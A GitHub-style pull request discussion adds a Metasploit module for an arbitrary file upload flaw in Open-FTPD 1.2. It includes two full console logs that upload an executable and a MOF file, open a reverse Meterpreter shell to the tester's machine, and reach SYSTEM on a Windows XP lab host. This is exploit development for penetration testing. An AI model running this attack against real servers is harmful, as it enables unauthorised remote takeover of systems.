Add Open-FTPD 1.2 Writable Directory Traversal Execution

[bcoles]

Add Open-FTPD 1.2 Writable Directory Traversal Execution

Homepage: http://sourceforge.net/projects/open-ftpd/
Tested on 1.2 (Windows XP SP3) (EN)

[jvazquez-r7]

Processing...

[jvazquez-r7]

According to the code, it looks like an arbitrary File Upload more than a directory traversal vulnerability, as written in the Name and Description of the module. Is it right or I'm forgetting something ?

Thanks!

[bcoles]

You're correct. 'Arbitrary file upload' is more applicable.

[jvazquez-r7]

Awesome, in this case, fixing things by myself, and landing, are just minor changes, thanks @bcoles!

[jvazquez-r7]

According to the code, it looks like an arbitrary File Upload more than a directory traversal vulnerability, as written in the Name and Description of the module. Is it right or I'm forgetting something ?

Thanks!

[jvazquez-r7]

Please add the next option to the metadata:

'Stance'         => Msf::Exploit::Stance::Aggressive,

In this way the TcpServer will finish once the exploit finishes :). Even when you're using the TcpServer mixin here, it's an aggressive but not a passive exploit.

[jvazquez-r7]

Once comments are clarified by @bcoles it's ready to be landed:

msf exploit(open_ftpd_wbem) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload bexsGiK.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50356 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload BRhkiOcs.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50358 - Sending MOF (2190 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:2481) at 2013-08-12 09:10:39 -0500
[+] Deleted wbem\mof\good\BRhkiOcs.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: bexsGiK.exe

meterpreter > exit
[*] Shutting down Meterpreter...

[jvazquez-r7]

Last changes here: 8ac01d3

Final test:

msf exploit(open_ftpd_wbem) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload luguTktG.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:52338 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload rgzFGsEGKn.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.0.3:52340 - Sending MOF (2199 bytes)
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:1039) at 2013-08-12 11:18:55 -0500
[+] Deleted wbem\mof\good\rgzFGsEGKn.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: luguTktG.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit
[*] Shutting down Meterpreter...

Thanks @bcoles !